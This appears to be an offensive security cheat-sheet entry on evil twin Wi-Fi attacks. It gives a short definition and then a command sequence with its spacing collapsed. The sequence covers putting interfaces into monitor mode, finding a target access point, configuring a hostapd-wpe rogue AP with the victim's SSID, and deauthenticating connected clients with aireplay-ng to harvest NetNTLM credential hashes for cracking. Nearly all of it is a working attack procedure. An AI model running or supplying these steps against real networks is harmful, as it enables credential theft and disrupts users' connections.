An evil twin is a fraudulent Wi-Fi access point that appears to be legitimate but is set up to eavesdrop on wireless communications.
The evil twin is the wireless LAN equivalent of the phishing scam.
# 1/ Start monitoring mode# If you plan to use deauth attack, connect the 2 eth interfaces at the same time# To avoid having wlan0mon and wlan0 (it can conflict)sudoairmon-ngstartwlan0# 2/ If process are blocking the monitoring mode, kill themsudoairmon-ngcheckkillsudokill<PID># 3/ Get the target AP (ESSID)# Your target can have multiples AP, and so multiples MAC addresses# They can run on differents channelssudoairodumpwlan0mon# 4/ Then set the target in the configuration filesudonano/etc/hostapd-wpe/hostapd-wpe.confssid=<ESSID># 5/ Start AP# You will only get people that newly connects to the target AP# If you want to get people already connected, you need to push the attack further with deauthsudohostapd-wpe/etc/hostapd-wpe/hostapd-wpe.conf# 6/ Start the second ethernet interfacesudoairmon-ngstartwlan1# 7/ Deauth (In another terminal)# Based on the differents ESSID and channels found in step 3# -0 is the number of deauth packet sentsudoaireplay-ng-010-a<macaddress>-c<channel># Then wait for credz \o/# You will probably get NetNTLMv1 hashes you will need to crack
